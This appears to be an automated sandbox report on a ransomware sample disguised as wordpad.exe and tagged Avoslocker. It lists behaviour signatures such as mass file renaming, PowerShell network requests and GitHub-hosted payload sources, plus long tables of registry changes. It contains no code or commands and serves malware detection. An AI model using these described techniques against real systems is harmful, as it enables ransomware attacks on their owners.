Analysis Overview
SHA256
09f10e7344ca61b53a080e4d54c7cb6ecd4e3308254b350906437e29e7a7d9b2
Threat Level: Known bad
The file wordpad.exe was found to be: Known bad.
Malicious Activity Summary
Avoslocker Ransomware
Renames multiple (69) files with added filename extension
Nirsoft
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Process spawned suspicious child process
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
Unsigned PE
Opens file in notepad (likely ransom note)
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 10:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 10:33
Reported
2024-06-21 10:55
Platform
win10v2004-20240611-de
Max time kernel
1009s
Max time network
998s
Command Line
Signatures
Avoslocker Ransomware
Nirsoft
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Renames multiple (69) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Process spawned suspicious child process
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Parent C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE is not expected to spawn this process | N/A | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl | C:\Windows\explorer.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\explorer.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState = 240000003428000000000000000000000000000001000000130000000000000062000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000064263917c9c3da01 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowStatusBar = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fb2e3517c9c3da01 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000000db13817c9c3da01 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "2" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634399871534502" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{11DBB47C-A525-400B-9E80-A54615A090C0} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 010000000000000062853a17c9c3da01 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ExplorerStartupTraceRecorded = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 = 6800310000000000d558eb551000414456414e437e310000500009000400efbed558eb55d558eb552e0000009c2e02000000060000000000000000000000000000008f8b2c0161006400760061006e00630065006400720075006e002d00780036003400000018000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\NodeSlot = "10" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e8005398e082303024b98265d99428e115f0000 | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
